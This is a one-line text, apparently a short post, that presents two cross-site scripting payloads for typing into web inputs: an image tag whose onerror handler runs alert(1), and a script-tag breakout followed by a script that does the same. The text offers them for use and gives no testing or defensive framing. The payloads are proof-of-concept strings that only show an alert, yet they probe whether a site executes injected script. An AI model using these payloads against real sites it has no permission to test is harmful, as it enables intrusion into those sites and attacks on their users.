You can get XSS by inputting these commands: <img/src=x onerror=alert(1)> </script><script>alert(1)</script>